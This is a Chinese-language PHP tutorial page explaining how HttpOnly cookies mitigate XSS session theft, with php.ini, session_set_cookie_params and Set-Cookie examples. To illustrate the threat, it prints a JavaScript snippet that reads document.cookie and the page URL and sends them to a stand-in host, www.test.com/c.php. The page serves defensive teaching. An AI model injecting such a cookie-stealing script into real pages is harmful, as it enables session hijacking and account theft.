溫馨提示×
您好,登錄后才能下訂單哦!
點擊 登錄注冊 即表示同意《億速云用戶服務條款》
您好,登錄后才能下訂單哦!
這篇文章將為大家詳細講解有關如何在php項目中使用httponly預防xss攻擊,文章內容質量較高,因此小編分享給大家做個參考,希望大家閱讀完這篇文章后對相關知識有一定的了解。
xss的概念就不用多說了,它的危害是極大的,這就意味著一旦你的網站出現xss漏洞,就可以執行任意的js代碼,最可怕的是攻擊者利用js獲取cookie或者session劫持,如果這里面包含了大量敏感信息(身份信息,管理員信息)等,那完了。。。
如下js獲取cookie信息:
復制代碼 代碼如下:
url=document.top.location.href;
cookie=document.cookie;
c=new Image();
c.src='http://www.test.com/c.php?c='+cookie+'&u='+url;
一般cookie都是從document對象中獲取的,現在瀏覽器在設置Cookie的時候一般都接受一個叫做HttpOnly的參數,跟domain等其他參數一樣,一旦這個HttpOnly被設置,你在瀏覽器的document對象中就看不到Cookie了。
PHP設置HttpOnly:
復制代碼 代碼如下:
//在php.ini中,session.cookie_httponly = ture 來開啟全局的Cookie的HttpOnly屬性
ini_set("session.cookie_httponly", 1);
//或者setcookie()的第七個參數設置為true
session_set_cookie_params(0, NULL, NULL, NULL, TRUE);
對于PHP5.1以前版本的PHP通過:
復制代碼 代碼如下:
header("Set-Cookie: hidden=value; httpOnly");
關于如何在php項目中使用httponly預防xss攻擊就分享到這里了,希望以上內容可以對大家有一定的幫助,可以學到更多知識。如果覺得文章不錯,可以把它分享出去讓更多的人看到。
免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。
